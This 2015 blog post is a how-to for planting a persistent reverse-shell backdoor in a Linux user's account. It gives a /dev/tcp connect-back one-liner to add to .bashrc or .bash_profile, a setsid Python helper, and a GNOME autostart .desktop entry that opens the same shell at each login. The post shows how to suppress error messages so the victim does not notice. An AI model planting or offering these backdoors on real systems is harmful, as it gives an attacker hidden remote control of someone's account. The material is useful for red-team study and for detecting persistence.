Tuesday, March 31, 2015

Bash backdoor

We have write access to a user's home directory and want shell access.  Bash sources a few files on startup:

.bash_profile -> new login (ssh/command line login)
.bashrc -> new bash instance (bash in a gnome-terminal)

If we add the following to one of those, we launch a connect back shell.
(setsid bash 1>&/dev/tcp/${HOST}/${PORT} 0>&1 & ) 2>/dev/null
Replace ${HOST} and ${PORT} to match your nc -lvp ${PORT} command.

setsid creates a new session for the process.  Launching in a new session allows the backdoor bash to continue running after the parent bash terminates.

Running the command in the subshell (the use of "(" and ")" ) hides the bash messages of the background process exiting.  The stderr redirect for the subshell hides failures like TCP connection failures.

While only specifying the redirection of stdin and stdout, the launched bash instance also redirects stderr to the TCP connection.  Bash must arrange that itself.

Replacing bash with Meterpreter might be worthwhile.  Metasploit & Meterpreter should handle multiple sessions while this will require a netcat instance per shell.

Originally, I open-coded a minimal daemon implementation in C. Then I rewrote to use the daemon(3) library call.  Then I tried just using setsid(2) at which point I found the setsid(1) utility.  That's much better than needing an additional program.  Python or Perl may provide a means to call setsid(2) and then exec(3) the shell without requiring an additional binary.  Something like:
$ cat ./setsid.py
#!/usr/bin/env python
import os
import sys

try:
        os.setsid()
except:
        pass
#print(sys.argv)
os.execvp(sys.argv[1], sys.argv[1:])
$ ./setsid.py bash
$ ps
  PID TTY          TIME CMD
 9912 pts/2    00:00:00 bash
10189 pts/2    00:00:00 bash
10262 pts/2    00:00:00 ps
nohup(1) may do something similar as well. setsid moves the process to another session so it won't receive the SIGHUP to terminate. nohup makes the process ignore SIGHUP, so it doesn't terminate.

You can also backdoor Gnome login with the following. Tested on Fedora 21 with Gnome 3.14. It may also work on other freedesktop.org compliant desktops. setsid isn't needed since the backdoor bash process ends up in its own session and persists after user logout. Maybe it's the combination of 'bash -c' using a subshell to run the backdoor bash? 'bash -c' is used to allow the file descriptor redirection. I doubted redirection would work if specified on the Exec= line, but did not test. 
.config/autostart/backdoor.desktop

[Desktop Entry]
Type=Application
Exec=bash -c '(bash 1>&/dev/tcp/${HOST}/${PORT} 0>&1 & ) 2>/dev/null'
Name=Bash Backdoor
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)